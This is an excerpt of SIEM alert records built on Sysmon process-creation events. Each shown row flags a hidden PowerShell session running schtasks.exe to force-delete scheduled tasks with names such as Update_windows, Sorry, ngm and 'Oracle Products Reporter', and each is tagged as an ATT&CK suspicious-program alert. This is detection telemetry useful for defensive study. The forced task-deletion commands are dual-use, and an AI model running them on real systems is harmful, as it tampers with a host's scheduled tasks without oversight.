+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.462786800Z"",""eventRecordID"":""3300"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.460\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010e7bd2b00}\r\nProcessId: 8056\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.460"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010e7bd2b00}"",""processId"":""8056"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.563",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.434 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010a8bb2b00} +ProcessId: 6676 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe 
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.437847300Z"",""eventRecordID"":""3299"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.434\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010a8bb2b00}\r\nProcessId: 6676\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.434"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010a8bb2b00}"",""processId"":""6676"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.542",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.404 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001064b92b00} +ProcessId: 
360 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.409104300Z"",""eventRecordID"":""3298"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.404\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001064b92b00}\r\nProcessId: 360\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.404"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001064b92b00}"",""processId"":""360"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.522",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.366 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001072b72b00} +ProcessId: 6180 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.369456500Z"",""eventRecordID"":""3297"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.366\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001072b72b00}\r\nProcessId: 6180\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 
10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.366"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001072b72b00}"",""processId"":""6180"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.506",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.240 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001031b52b00} +ProcessId: 4772 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.242883700Z"",""eventRecordID"":""3296"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.240\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001031b52b00}\r\nProcessId: 4772\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.240"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001031b52b00}"",""processId"":""4772"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.473",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.212 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00102ab32b00} +ProcessId: 8008 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 
6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.214632600Z"",""eventRecordID"":""3295"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.212\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00102ab32b00}\r\nProcessId: 8008\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 
-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.212"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00102ab32b00}"",""processId"":""8008"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.451",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.184 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001004b12b00} +ProcessId: 6200 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams 
